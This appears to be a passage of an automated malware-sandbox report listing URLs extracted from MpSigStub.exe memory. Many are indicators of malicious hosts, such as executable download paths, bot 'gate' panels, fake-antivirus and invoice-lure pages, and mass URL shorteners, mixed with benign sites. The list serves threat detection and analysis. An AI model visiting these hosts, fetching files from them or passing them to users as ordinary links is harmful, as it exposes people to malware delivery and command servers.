    Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmpString found in binary or memory: http://89.248.161.2/yourdoc.doc
    Source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmpString found in binary or memory: http://89.45.14.196/p1/server
    Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmpString found in binary or memory: http://8nasrcity.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmpString found in binary or memory: http://9.bohmamei.com/links/return-west.php
    Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmpString found in binary or memory: http://91.108.68.202/up.php
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpString found in binary or memory: http://91.142.64.91/quantserve/quant.js
    Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmpString found in binary or memory: http://91.188.117.157/
    Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmpString found in binary or memory: http://91.188.124.171/
    Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmpString found in binary or memory: http://91.196.216.64/s.php?ref=
    Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmpString found in binary or memory: http://91.238.134.77/
    Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmpString found in binary or memory: http://91.239.15.61/google.js
    Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: http://92.222.7.
    Source: MpSigStub.exe, 00000023.00000003.6311413449.0000028BD79B9000.00000004.00000001.sdmpString found in binary or memory: http://92.38.135.46/43cfqysryip51zzq.php
    Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmpString found in binary or memory: http://92.63.197.106/c.exe
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://92.63.197.153/blowjob.exe
    Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmpString found in binary or memory: http://92.63.197.153/good.exe
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://92.63.197.48/
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://92.63.197.48/g
    Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmpString found in binary or memory: http://92.63.197.48/m/tm.exe%temp%
    Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: http://92.63.197.60/c.exe
    Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmpString found in binary or memory: http://93.189.43.3/kinsingchmod
    Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: http://94.102.14.
    Source: MpSigStub.exe, 00000023.00000003.6280803860.0000028BD7E31000.00000004.00000001.sdmpString found in binary or memory: http://94.103.85.236/ds/11.gif
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpString found in binary or memory: http://94.156.174.7/up/a1a.htmyx_h=
    Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmpString found in binary or memory: http://94.23.210.144/promo/promo.php
    Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmpString found in binary or memory: http://94.23.39.156/fakeav/files.php?jsoncallback=?
    Source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmpString found in binary or memory: http://94.75.
    Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: http://95.173.183.
    Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmpString found in binary or memory: http://95.46.99.199/template.doc
    Source: MpSigStub.exe, 00000023.00000003.6286543485.0000028BD62AA000.00000004.00000001.sdmpString found in binary or memory: http://95.64.47.164/
    Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmpString found in binary or memory: http://980.jlbtcg.cn
    Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmpString found in binary or memory: http://9ifz.org/2345
    Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmpString found in binary or memory: http://9o0gle.com/
    Source: MpSigStub.exe, 00000023.00000003.6292138132.0000028BD80C5000.00000004.00000001.sdmpString found in binary or memory: http://Andrei512.narod.ru
    Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmpString found in binary or memory: http://Botnet.8800.org
    Source: RegAsm.exe, 0000000A.00000002.7244913734.000000001E201000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpString found in binary or memory: http://Motobit.cz
    Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: http://Viewpics.DYNU.com/views.php?dir=pics&section=hot&clip=14
    Source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmpString found in binary or memory: http://YOURSITE.com/bot.exea
    Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: http://Yyl.mofish.cn/interFace/ActiveSeed.aspx
    Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: http://Yyl.mofish.cn/interface/SeedInstall.aspx
    Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: http://Yyl.mofish.cn/wevoo/data.dat
    Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: http://Yyl.mofish.cn/wevoo/data/data
    Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: http://Yyl.mofish.cn/wevoo/lists/200
    Source: MpSigStub.exe, 00000023.00000003.6266211680.0000028BD6B88000.00000004.00000001.sdmpString found in binary or memory: http://a-search.biz/&
    Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmpString found in binary or memory: http://a.pomf.cat/
    Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmpString found in binary or memory: http://a.pomf.cat/zjiqnx.html
    Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmpString found in binary or memory: http://a.pomfe.co/hnwila.xml
    Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmpString found in binary or memory: http://a.up-00.com/
    Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmpString found in binary or memory: http://a0571310.xsph.ru/djfklvk/revert.php
    Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmpString found in binary or memory: http://a1us6j2z.recordgate.co
    Source: MpSigStub.exe, 00000023.00000003.6334830370.0000028BD7708000.00000004.00000001.sdmpString found in binary or memory: http://aaacollectionsjewelry.com/x9djsa
    Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmpString found in binary or memory: http://aancyber77.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmpString found in binary or memory: http://aapache.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmpString found in binary or memory: http://aartemis.com/?type=sc&ts=
    Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmpString found in binary or memory: http://abeidaman.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpString found in binary or memory: http://abidjanlit.com/loyiruef/invoice/
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpString found in binary or memory: http://abitando.net/outstanding-invoices/
    Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmpString found in binary or memory: http://abluefantasies.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpString found in binary or memory: http://about:blankhao.360.cn
    Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmpString found in binary or memory: http://abraandthong.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://acacia19.pansy.ero0101.com/set_inf.php?id=ero257.wmv&sid=
    Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmpString found in binary or memory: http://academiamylife.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmpString found in binary or memory: http://acayipbiri.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmpString found in binary or memory: http://acceso.masminutos.com
    Source: MpSigStub.exe, 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmpString found in binary or memory: http://acetica.online/presently/refuge/
    Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmpString found in binary or memory: http://acipatobo01.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
    Source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0
    Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmpString found in binary or memory: http://actionforfiletransferthroughcloudbusinessinternationalglobalsys.ydns.eu/business/business.doc
    Source: MpSigStub.exe, 00000023.00000003.6339389691.0000028BD7F38000.00000004.00000001.sdmpString found in binary or memory: http://activecodec.0fees.net/codec/mp3/codec_download.htm
    Source: MpSigStub.exe, 00000023.00000003.6320105225.0000028BD6890000.00000004.00000001.sdmpString found in binary or memory: http://activedating.net
    Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmpString found in binary or memory: http://actresswallpaperbollywood.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: http://acutelogisticsltd.com/wp-content/themes/acutelogisticsltd/js/ie-emulation-modes-warning.js
    Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmpString found in binary or memory: http://ad.171817.com/css/1.js
    Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmpString found in binary or memory: http://ad.eltext.com
    Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmpString found in binary or memory: http://ad.tuzikmedia.biz
    Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmpString found in binary or memory: http://adaptservices.net/qwao8cj4gkogu
    Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmpString found in binary or memory: http://addictedtobash.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmpString found in binary or memory: http://adf.ly
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://adobe-mark.byethost3.com/adobe-mail/pdf.php)
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://adoffy.alltuckedinathome.com:8080/led.js
    Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmpString found in binary or memory: http://ads.8866.org/
    Source: MpSigStub.exe, 00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmpString found in binary or memory: http://ads.eorezo.com/cgi-bin/advert/getads.cgi?
    Source: MpSigStub.exe, 00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmpString found in binary or memory: http://ads.eorezo.com/cgi-bin/advert/getads?
    Source: MpSigStub.exe, 00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmpString found in binary or memory: http://ads.eorezo.com/cgi-bin/advert/getads?x_dp_id=
    Source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmpString found in binary or memory: http://ads4.think-adz.com/
    Source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmpString found in binary or memory: http://ads4.think-adz.com/xD
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://adsgo.zh-cn.cc/?
    Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmpString found in binary or memory: http://adsl.carpediem.fr/perl/invoc_oneway.pl?
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://adult-analsexadult.com/pc/page/set_reg.php?code=&cuid=
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://adult-fetishismsexadult.com/pc/page/set_reg.php?code=&cuid=
    Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmpString found in binary or memory: http://adult-xxx-sex-porn-playboy.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmpString found in binary or memory: http://adv-inc-net.com/trackingcode/tracker.html
    Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmpString found in binary or memory: http://advadmin.biz/tasks
    Source: MpSigStub.exe, 00000023.00000003.6335125176.0000028BD6F68000.00000004.00000001.sdmpString found in binary or memory: http://advancedcleaner.com
    Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmpString found in binary or memory: http://advancedtopmax.info/e/59034b87bbb71/59034b87bbbcc.bin
    Source: MpSigStub.exe, 00000023.00000003.6267730911.0000028BD756A000.00000004.00000001.sdmpString found in binary or memory: http://advgoogle.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmpString found in binary or memory: http://adwpro.avelite.hop.clickbank.net/?mode=p
    Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmpString found in binary or memory: http://adyingtiger.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmpString found in binary or memory: http://aerytyre.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6341254844.0000028BD7D97000.00000004.00000001.sdmpString found in binary or memory: http://aescripts.com
    Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmpString found in binary or memory: http://afkar.today/test_coming.training/w_f/
    Source: MpSigStub.exe, 00000023.00000003.6310448430.0000028BD6169000.00000004.00000001.sdmpString found in binary or memory: http://ag.ru
    Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmpString found in binary or memory: http://agent.wizztrakys.com/csdi/wizzmonetize/
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://agentwarderprotector.info/
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://ago2.co.kr/bbs/data/dir/note.png
    Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmpString found in binary or memory: http://agressor58.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmpString found in binary or memory: http://ahkscript.org
    Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmpString found in binary or memory: http://ahkscript.orgxw
    Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmpString found in binary or memory: http://ahmad-roni.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmpString found in binary or memory: http://aindonashi.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmpString found in binary or memory: http://ainsleywirefly.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmpString found in binary or memory: http://aircel3ghack.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://airsquirrels.com/
    Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmpString found in binary or memory: http://aitimatafb.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6328555317.0000028BD68B2000.00000004.00000001.sdmpString found in binary or memory: http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
    Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmpString found in binary or memory: http://ajeyftrjqeashgda.mobi/mSsQDIMIQ/inIDw/
    Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmpString found in binary or memory: http://ajustek.com.br/pt-br/clicks.php?
    Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmpString found in binary or memory: http://akdoganevdeneve.net/wp-content/Panel/gate.php
    Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmpString found in binary or memory: http://aklick.info/d.php?date=
    Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmpString found in binary or memory: http://bit.do/fqnfa
    Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmpString found in binary or memory: http://bit.do/fqnzq
    Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmpString found in binary or memory: http://bit.do/fqrh4
    Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmpString found in binary or memory: http://bit.do/fqv6g
    Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmpString found in binary or memory: http://bit.do/fqv8b
    Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmpString found in binary or memory: http://bit.do/fqwam
    Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmpString found in binary or memory: http://bit.do/fqwdq
    Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmpString found in binary or memory: http://bit.do/fqxt8
    Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmpString found in binary or memory: http://bit.do/fqxx3
    Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmpString found in binary or memory: http://bit.do/fqxx8
    Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmpString found in binary or memory: http://bit.do/fqyco
    Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmpString found in binary or memory: http://bit.do/fqycs
    Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmpString found in binary or memory: http://bit.do/fqyh6
    Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmpString found in binary or memory: http://bit.do/fqyha
    Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmpString found in binary or memory: http://bit.do/fqyhe
    Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmpString found in binary or memory: http://bit.do/fqyhk
    Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmpString found in binary or memory: http://bit.do/fqzi9
    Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmpString found in binary or memory: http://bit.do/fqzim
    Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmpString found in binary or memory: http://bit.do/fqzmn
    Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmpString found in binary or memory: http://bit.do/fqzmv
    Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmpString found in binary or memory: http://bit.do/fqzr4
    Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmpString found in binary or memory: http://bit.do/fqzt3
    Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmpString found in binary or memory: http://bit.do/fqztv
    Source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmpString found in binary or memory: http://bit.ly
    Source: MpSigStub.exe, 00000023.00000003.6295487239.0000028BD661C000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmpString found in binary or memory: http://bit.ly/
    Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmpString found in binary or memory: http://bit.ly/1r9mffb)
    Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmpString found in binary or memory: http://bit.ly/28jsjnq)
    Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmpString found in binary or memory: http://bit.ly/29vi7ez)
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://bit.ly/2cobwhj)
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://bit.ly/2cokxeu)
    Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmpString found in binary or memory: http://bit.ly/2cqkvnc)
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://bit.ly/2df4jbx)
    Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmpString found in binary or memory: http://bit.ly/2h3fi0m)
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: http://bit.ly/2hload25ydu19
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://bit.ly/2jg4gfn)
    Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmpString found in binary or memory: http://bit.ly/2kud4md)
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://bit.ly/2p8qtra)
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://bit.ly/2q93tca)
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: http://bitcoincoin.xyz/payment/xls.exe
    Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: http://bittupadam.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmpString found in binary or memory: http://bitzroid.com
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://bjphplegal.org/wp-admin/script/)/s/uri
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://black43.ars.0manko.jp/set_inf.php?id=movies.wmv&cid=
    Source: MpSigStub.exe, 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmpString found in binary or memory: http://blackhole.ddnsgeek.com:8088
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://blackl1vesmatter.org/gate
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://blackl1vesmatter.org/success
    Source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmpString found in binary or memory: http://blacksun.phpnet.us/
    Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmpString found in binary or memory: http://blackterias.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmpString found in binary or memory: http://blank-record.com/cgi-bin/search?id=
    Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmpString found in binary or memory: http://blattodea.ru/acd53ad2/although/clamp/
    Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmpString found in binary or memory: http://blessedindia.org/9ifuurhgwq
    Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmpString found in binary or memory: http://bln8225.casacam.net/zxqjhjubakff/
    Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmpString found in binary or memory: http://blog-ilmu10.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmpString found in binary or memory: http://blog-misteri.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmpString found in binary or memory: http://blog-rye.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmpString found in binary or memory: http://blog.daum.net/ahahvideo
    Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmpString found in binary or memory: http://blog.eduadda.in/wp-content/themes/twentythirteen/get.php?id=
    Source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmpString found in binary or memory: http://blog.x-row.net/
    Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmpString found in binary or memory: http://blogcliphai.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmpString found in binary or memory: http://bloggersiput.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmpString found in binary or memory: http://bloggiaitribg.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmpString found in binary or memory: http://bloghumortododiablog.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmpString found in binary or memory: http://blogketoanthue.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmpString found in binary or memory: http://bloglistcorner.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmpString found in binary or memory: http://blogluyoruz.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmpString found in binary or memory: http://blogphimhay41.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmpString found in binary or memory: http://blogsemasacaparnab.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpString found in binary or memory: http://bloodcrypt.com/info/info.txt
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpString found in binary or memory: http://bloodybits.com/edwinjefferson.com/ie_xo/
    Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmpString found in binary or memory: http://blufda.com/
    Source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmpString found in binary or memory: http://bnpost.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmpString found in binary or memory: http://bogle.com
